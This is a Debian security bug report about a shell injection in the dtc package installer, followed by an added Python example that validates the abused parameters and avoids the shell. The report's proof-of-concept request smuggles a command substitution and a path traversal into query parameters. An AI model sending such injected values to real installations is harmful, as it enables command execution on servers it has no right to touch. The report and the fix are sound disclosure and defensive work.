Ansgar Burchardt
2011-Aug-13 09:00 UTC
[Secure-testing-team] Bug#637630: shell injection in package installer
Package: src:dtc
Version: 0.32.10-2
Severity: critical
Tags: security upstream

The package installer helpfully allows users to run shell code:

wget -q -O- 'http://localhost:8080/dtc/?adm_login=asd&adm_pass=asdf&action=do_install&pkg=../../../../../../../../../tmp&addrlink=asd.com/package-installer&dtcpkg_directory=$(touch /tmp/more-owned)/tmp/foo&subdomain=www'

Ansgar
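
Added example, not part of the original report and not DTC's code: one way to handle the two parameters the request above abuses, by allowlisting each as a single path component and building the command as an argument vector so that no shell ever parses the values. The roots PKG_ROOT and SITE_ROOT, the cp command, and the assumption that pkg and dtcpkg_directory are meant to be plain directory names are hypothetical.

```python
import re
import subprocess
import sys
from urllib.parse import urlsplit, parse_qs

# Constructed from the request in the report above (same parameters and values).
REPORTED_URL = (
    "http://localhost:8080/dtc/?adm_login=asd&adm_pass=asdf&action=do_install"
    "&pkg=../../../../../../../../../tmp&addrlink=asd.com/package-installer"
    "&dtcpkg_directory=$(touch /tmp/more-owned)/tmp/foo&subdomain=www"
)
# Constructed benign request for comparison.
BENIGN_URL = "http://localhost:8080/dtc/?action=do_install&pkg=wordpress&dtcpkg_directory=blog"

# Hypothetical fixed roots; the real installer's paths are not shown in the report.
PKG_ROOT = "/srv/example/packages"
SITE_ROOT = "/srv/example/sites"

# One path component: no '/', no leading '.', no shell metacharacters.
COMPONENT = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


class RejectedParameter(ValueError):
    pass


def component(params, name):
    """Return params[name] if it is a single safe path component, else raise."""
    values = params.get(name, [])
    if len(values) != 1 or not COMPONENT.fullmatch(values[0]):
        raise RejectedParameter(name)
    return values[0]


def install_argv(url):
    """Build the copy command as an argument vector (never a shell string)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    pkg = component(params, "pkg")
    target = component(params, "dtcpkg_directory")
    return ["cp", "-R", "--", f"{PKG_ROOT}/{pkg}", f"{SITE_ROOT}/{target}"]


def argument_as_seen_by_child(value):
    """Pass value as one argv entry with no shell; the child echoes it back."""
    child = [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", value]
    return subprocess.run(child, capture_output=True, text=True, check=True).stdout
```

The allowlist rejects the reported request before any command is built; the argument-vector form is the second layer, since a value that is never handed to a shell reaches the child process as literal text.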